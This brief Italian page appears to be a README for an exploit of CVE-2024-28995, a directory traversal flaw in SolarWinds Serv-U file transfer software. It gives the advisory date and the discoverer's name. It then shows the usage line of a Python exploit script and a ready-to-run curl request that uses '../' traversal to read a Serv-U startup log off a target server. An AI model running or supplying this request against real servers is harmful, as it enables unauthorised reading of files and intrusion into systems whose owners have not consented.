
Exploit per CVE-2024-28995
Il 5 giugno 2024, SolarWinds ha pubblicato un advisory per CVE-2024-28995, una vulnerabilità di directory traversal ad alta severità che colpisce la loro soluzione di trasferimento file Serv-U. La vulnerabilità è stata scoperta dal ricercatore Hussein Daher di Web Immunify.
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
Riferimento: